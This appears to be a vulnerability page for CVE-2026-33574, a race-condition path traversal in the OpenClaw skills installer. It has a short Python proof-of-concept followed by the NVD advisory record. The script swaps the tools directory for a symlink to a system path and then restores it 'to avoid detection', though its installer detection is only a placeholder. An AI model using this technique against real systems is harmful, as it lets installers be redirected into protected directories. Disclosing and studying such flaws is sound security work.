CVE-2026-33574

#!/usr/bin/env python3 # Proof of Concept for CVE-2026-33574 (TOCTOU Path Traversal) # This script simulates the race condition by monitoring and swapping the directory. import os import time import sys MALICIOUS_TARGET = "/etc/sensitive_dir" ORIGINAL_DIR = "/var/tmp/openclaw/tools" print(f"[*] Starting PoC for CVE-2026-33574") print(f"[*] Targeting path: {ORIGINAL_DIR}") try: # Ensure the original directory exists if not os.path.exists(ORIGINAL_DIR): os.makedirs(ORIGINAL_DIR) # Monitor for the installer process (simulated) # In a real scenario, one might use inotify or ptrace while True: # Simulate the 'Check' phase passing if "installer_running": # Placeholder for actual detection logic print("[!] Installer detected, attempting race condition...") # Step 1: Rename original directory (simulating the 'Check' validation) if os.path.exists(ORIGINAL_DIR): os.rename(ORIGINAL_DIR, ORIGINAL_DIR + ".bak") # Step 2: Create a symlink to the malicious target (Rebinding) os.symlink(MALICIOUS_TARGET, ORIGINAL_DIR) print(f"[+] Path rebound to {MALICIOUS_TARGET}") # Step 3: Wait for the 'Use' phase (Write operation) time.sleep(0.1) # Step 4: Restore original state to avoid detection/crashes os.remove(ORIGINAL_DIR) os.rename(ORIGINAL_DIR + ".bak", ORIGINAL_DIR) print("[+] Path restored") break except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2026-33574", "sourceIdentifier": "[email protected]", "published": "2026-03-29T13:17:03.173", "lastModified": "2026-03-31T17:12:54.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw before 2026.3.8 contains a path traversal vulnerability in the skills download installer that validates the tools root lexically but reuses the mutable path during archive download and copy operations. A local attacker can rebind the tools-root path between validation and final write to redirect the installer outside the intended tools directory."}, {"lang": "es", "value": "OpenClaw antes de 2026.3.8 contiene una vulnerabilidad de salto de ruta en el instalador de descarga de habilidades que valida la raíz de las herramientas léxicamente pero reutiliza la ruta mutable durante las operaciones de descarga y copia del archivo. Un atacante local puede reasignar la ruta tools-root entre la validación y la escritura final para redirigir el instalador fuera del directorio de herramientas previsto."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.8", "matchCriteriaId": "0A2A36CE-E6EC-4C9C-85F4-06C408B57A72"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/9abf014f3502009faf9c73df5ca2cff719e54639", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vhwf-4x96-vqx2", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-path-traversal-via-tools-root-rebinding-in-skills-download", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}